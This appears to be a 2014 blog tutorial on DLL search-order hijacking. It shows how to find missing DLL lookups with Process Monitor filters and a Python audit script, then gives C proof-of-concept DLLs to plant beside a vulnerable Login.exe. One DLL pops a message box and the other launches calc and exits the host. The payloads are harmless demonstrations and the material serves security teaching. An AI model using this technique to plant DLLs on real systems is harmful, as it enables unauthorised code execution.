Sunday, September 21, 2014

Finding and Exploiting DLL Injection Vulnerabilities


We need the Process Monitor tool, part of the Sysinternals suite, to find the vulnerability.

Attempts by the process under analysis to load non-existent Dynamic Link Libraries (DLLs) can be found with the following Process Monitor filter:

Process Name    is           wab.exe           then Include
Path            ends with    .dll              then Include
Result          is           NAME NOT FOUND    then Include
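As an added example that is not part of the original post, the same three filter conditions applied offline to a saved Process Monitor CSV export, so a capture of one's own application can be audited for DLL lookups that fail in the directory it runs from. The column names assume Procmon's default CSV export layout and the sample rows are constructed.

```python
import csv
import io
from collections import defaultdict

# Constructed sample of a Process Monitor CSV export (default column set assumed);
# the Login.exe rows mirror the SXS.dll / CLBCATQ.dll lookups from the write-up.
SAMPLE_CSV = """Time of Day,Process Name,PID,Operation,Path,Result,Detail
10:01:02.1,Login.exe,1234,CreateFile,C:\\Tools\\SXS.dll,NAME NOT FOUND,Desired Access: Read Attributes
10:01:02.2,Login.exe,1234,CreateFile,C:\\Windows\\System32\\SXS.dll,SUCCESS,Desired Access: Read Attributes
10:01:02.3,Login.exe,1234,CreateFile,C:\\Tools\\CLBCATQ.dll,NAME NOT FOUND,Desired Access: Read Attributes
10:01:02.4,Login.exe,1234,CreateFile,C:\\Tools\\config.ini,NAME NOT FOUND,Desired Access: Generic Read
10:01:03.0,explorer.exe,900,CreateFile,C:\\Windows\\System32\\shell32.dll,SUCCESS,Desired Access: Read Data
"""


def missing_dlls(csv_text, process_name):
    """Apply the write-up's three filter conditions (process name, path ends
    with .dll, result NAME NOT FOUND) to a Procmon CSV export and group the
    results by DLL file name. For each DLL that failed at least once, also
    record where the same name later resolved, so a failure in the application
    directory followed by a hit in System32 is visible at a glance."""
    lookups = defaultdict(lambda: {"not_found": [], "resolved": []})
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process_name.lower():
            continue
        path = row["Path"]
        if not path.lower().endswith(".dll"):
            continue
        name = path.rsplit("\\", 1)[-1].lower()
        if row["Result"] == "NAME NOT FOUND":
            lookups[name]["not_found"].append(path)
        elif row["Result"] == "SUCCESS":
            lookups[name]["resolved"].append(path)
    # Names that only ever resolved are not interesting for this audit.
    return {n: v for n, v in lookups.items() if v["not_found"]}


if __name__ == "__main__":
    for name, info in missing_dlls(SAMPLE_CSV, "Login.exe").items():
        print(name)
        for p in info["not_found"]:
            print("  NAME NOT FOUND at", p)
        for p in info["resolved"]:
            print("  later resolved at", p)
        if not info["resolved"]:
            print("  never resolved anywhere in this capture")
```

A name that is never resolved anywhere in the capture is the one to fix first in the application's loader configuration, since every lookup for it fails.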


The filter above and the snapshot show that Login.exe could not find DLLs such as SXS.dll and CLBCATQ.dll.
Create a DLL with the following code, rename it to one of the missing names (SXS.dll, CLBCATQ.dll) and copy it into the directory from which the vulnerable binary is executed.


#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved)
{
    /* Show the message once, when the DLL is first mapped into the process;
       MessageBoxW is used explicitly because the strings are wide (L"..."). */
    if (fdwReason == DLL_PROCESS_ATTACH) {
        MessageBoxW(NULL, L"DLL Injection by Disects !",
                    L"developed by Praveen Darshanam",
                    MB_ICONWARNING | MB_CANCELTRYCONTINUE | MB_DEFBUTTON2);
    }
    return TRUE;
}


Searching for the DLL we injected
When we execute the Login.exe binary, our DLL is injected and the code in the DLL runs.



To launch the calculator instead, the following code can be used:
    #include <windows.h>
    #include <stdlib.h>   /* exit() */

    /* Launch calc with a hidden window (uCmdShow 0) and terminate the host process. */
    int exec_calc(void)
    {
        WinExec("calc", 0);
        exit(0);
        return 0;   /* never reached */
    }

    BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason,
                        LPVOID lpvReserved)
    {
        if (fdwReason == DLL_PROCESS_ATTACH)
            exec_calc();
        return TRUE;
    }

Done!